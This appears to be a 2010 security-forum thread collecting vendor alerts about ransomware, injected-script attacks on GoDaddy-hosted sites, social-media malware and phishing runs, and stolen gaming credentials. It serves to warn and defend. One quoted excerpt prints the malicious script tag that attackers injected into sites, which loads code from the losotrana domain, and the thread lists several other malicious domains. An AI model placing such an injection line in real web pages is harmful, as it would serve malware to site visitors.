Windows “activation” ransomware
FYI...
Windows “activation” ransomware
- http://sunbeltblog.blogspot.com/2010...ansomware.html
May 17, 2010 - "... a piece of ransomware that locks up Windows until you enter your credit card data. First it claims you are running a pirated version of Windows and they need your billing details. “... but your credit card will NOT be charged”... Once you enter your credit card details, it will “activate” your “pirated” OS and make it legitimate. Basically, the Trojan locks your system. The only thing you can do is complete the "activation". You can choose to "activate windows" or "do it later". If you choose to do it later, your machine reboots... Your credit card information is shipped off to a network of fast-flux bots standing by ready to receive it..."
(Screenshots available at the URL above.)
:mad:
GoDaddy attacks continue...
FYI... 'suggest BLOCK THEM ALL...
- http://community.websense.com/blogs/...ain_2100_.aspx
19 May 2010 - "... The domain kdjkfjskdfjlskdjf .com is directly related to the ongoing attacks and still appears on injected sites. Another set of domains is losotrana .com, holasionweb .com, indesignstudioinfo .com and zettapetta .com. Checking the number of hits... over this past weekend revealed more than 23,000 infected pages with this kind of attack, and it's still growing. The malicious code is injected by the attackers into PHP files on the server..."
(More detail at the Websense URL above.)
- http://www.malwaredomains.com/wordpress/?p=972
May 18, 2010 - Please block losotrana . com ASAP. Source...
GoDaddy attacks continue...
- http://blog.sucuri.net/2010/05/conti...t-godaddy.html
May 17, 2010 - "And it is still not over. Remember the code we found last week* that was hacking all the PHP files at GoDaddy? It is still happening, but now using the losotrana .com domain ( http: //losotrana .com/js.php ). This is the script that will show up on your site if you get hacked:
<script src="http: //losotrana .com/js.php"></script>
Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:
http://blog.sucuri.net/2010/05/found...alware-at.html
You can clean up using this script:
http://blog.sucuri.net/2010/05/simpl...or-latest.html
All the sites so far hosted at GoDaddy... GoDaddy admitted they have a problem, but it looks like they were not able to fix it yet... this Losotrana .com site is hosted at the same domain as holasionweb .com used on the previous attack..."
* http://blog.sucuri.net/2010/05/found...alware-at.html
May 12, 2010
___
- http://google.com/safebrowsing/diagn...dfjlskdjf.com/
"... last time Google visited this site was on 2010-05-15, and the last time suspicious content was found on this site was on 2010-05-15. Malicious software includes 6 scripting exploit(s)..."
- http://google.com/safebrowsing/diagn...losotrana.com/
"... last time Google visited this site was on 2010-05-17, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 6 scripting exploit(s)..."
- http://google.com/safebrowsing/diagn...lasionweb.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 108 scripting exploit(s), 1 trojan(s)..."
- http://google.com/safebrowsing/diagn...tudioinfo.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 11 scripting exploit(s)..."
- http://google.com/safebrowsing/diagn...ettapetta.com/
"... The last time Google visited this site was on 2010-05-14, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 2 scripting exploit(s)..."
:fear::mad:
Twitter attack - in progress...
FYI...
Twitter attack - in progress...
- http://www.f-secure.com/weblog/archives/00001954.html
May 20, 2010 11:37 GMT - "... another malware run underway on Twitter. A fairly large pool of fake accounts are sending out messages with popular hashtags and the text "haha this is the funniest video ive ever seen"... People see these messages when they look for trending topics in Twitter. The shortlinks in the Tweets point to a page under pc-tv .tv, which uses a Java exploit to drop a keylogger / banking trojan combo to your system..."
:mad:
AutoRun worms still alive
FYI...
AutoRun worms still alive...
- http://blog.trendmicro.com/new-autor...ze-action-key/
May 18, 2010 - " ... malware proponents continue to find new techniques to proliferate their malicious creations despite workarounds that users employ to prevent them from automatically running on their systems... simply disabling AutoPlay just does not cut it anymore. Extra steps such as monitoring where external devices are used and updating all security software to combat potential threats should also be taken. For business users, security policies regarding data access and the use of external devices should be employed and enforced across the organization. Additional information about malware-protecting removable devices can be found in 'How to Maximize the Malware Protection of Your Removable Drives'*".
* http://blog.trendmicro.com/how-to-ma...ovable-drives/
:fear::fear:
Beware the trader bearing free gifts...
FYI...
Beware the trader bearing free gifts...
- http://gizmodo.com/5544593
May 21, 2010 - "... lecturing in the importance of protecting PCs..."
- http://preview.tinyurl.com/2bjdjau
22 May 2010 - "... over 99 different malicious applications were used in this and last weekends attacks."
:fear::fear:
44 million stolen gaming credentials uncovered
FYI...
44 million stolen gaming credentials uncovered
- http://www.symantec.com/connect/blog...ials-uncovered
May 26, 2010 - "... We recently analyzed a new sample submitted to Symantec and came across a server hosting the credentials of 44 million stolen gaming accounts. What was interesting about this threat wasn’t just the sheer number of stolen accounts, but that the accounts were being validated by a Trojan distributed to compromised computers. Symantec detects this threat as Trojan.Loginck*. This particular database server we uncovered seems very much to be the heart of the operation—part of a distributed password checker aimed at Chinese gaming websites. The stolen login credentials are not just from particular online games, but also include user login accounts associated with sites that host a variety of online games. In both cases the accounts contained in the database have been obtained from other sources, most likely using malware with information-stealing capabilities, such as Infostealer.Gampass **. So, picture this: you are a bad guy and have created or purchased a botnet. You have targeted online gaming websites and now have 44 million sets of gaming credentials at your disposal... The database in question currently holds approximately 17GB of flat file data. The particular sample we analysed attempted to validate passwords for Wayi Entertainment, but there are credentials for at least 18 gaming websites in the database... if you are in possession of a gaming account from one of the websites listed above, an update of your password would not go amiss..."
* http://www.symantec.com/business/sec...052013-2257-99
** http://www.symantec.com/security_res...111201-3853-99
:fear:
Credit union fraud via phish for U.S. Servicemen and Vets
FYI...
Credit union fraud via phish for U.S. Servicemen and Vets
- http://www.symantec.com/connect/blog...veterans-guard
May 25, 2010 - "... a phishing site was observed to be spoofing a credit union that provides financial services to members of the U.S. Defense Department and their family members. The defense forces covered by the credit union include the Army, Marine Corps, Navy, and Air Force. The services are provided to their customers even after they retire from the armed forces or join some other organization. Further, those who have joined the credit union can have the membership services extend to their family members. The brand has now grown to serve millions of customers across the U.S. The phishing site states that the customer’s login has been locked because of several failed login attempts. The page further states that the customer needs to fill in a form with certain sensitive information to unlock the login. The sensitive information includes social security number, credit card details, date of birth, mother’s maiden name, and details of the account’s joint owner. The page also includes a fake CAPTCHA that accepts data irrespective of the number entered. When the sensitive information is entered, the phishing site states that the customer’s password is unlocked for logging in. The page is then redirected to the legitimate site... The phishing site was hosted on an IP-based domain (IP-based URLs look like this - http ://255.255.255.255/) based on servers in Taiwan. Variants of the phishing URL have been utilized to spoof other brands as well. Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:
• Do not click on suspicious links in email messages.
• Check the URL of the website and make sure that it belongs to the brand.
• Type the domain name of your brand’s website directly into your browser’s address bar rather than following any link.
• Frequently update your security software..."
:fear:
boingboing .com spews drive-by-download malware...
FYI...
boingboing .com spews malware...
- http://news.cnet.com/8301-27080_3-20005969-245.html
May 26, 2010 - "... Armorize scanned the Alexa top-ranked 200,000 Web sites and found that 1 percent were infected with malware that can be used in drive-by downloads. One site Armorize found to be used as a vehicle for delivering malware was boingboing .com, which attackers were likely using in the hopes of reaching a broad audience by taking advantage of the proximity of the domain to the popular blog at Boingboing.net..."
* http://blog.armorize.com/2010/05/bew...m-malware.html
:fear::mad:
Facebook attacked again...
FYI...
Facebook attacked again...
- http://community.websense.com/blogs/...-facebook.aspx
28 May 2010 09:11 PM - "... For the third weekend in a row users on Facebook are bombarded with messages on their walls talking about Distracting Beach Babes, Sexiest Video Ever or this latest attack which supposedly is the "Most Hilarious Video ever"... This attack is different from previous weekends as not only do the attackers try to steal your Facebook credentials, what happens after that depends on which country you connect from. Once you click on the link to view the video you are taken to a fake Facebook login page where you are tricked into entering your credentials. The login page look like the real thing except of course if you look at the address bar you can see that you're not on facebook.com. But users can easily be tricked into thinking that they temporarily were logged out of Facebook and to continue they have to login..."
(Screenshots available at the URL above.)
- http://blog.webroot.com/2010/05/28/f...e-by-download/
May 28, 2010
- http://www.sophos.com/blogs/gc/g/201...acebook-users/
May 31, 2010 - "Hundreds of thousands of Facebook users have fallen for a social-engineering trick which allowed a clickjacking worm to spread quickly over Facebook..."
:fear::mad: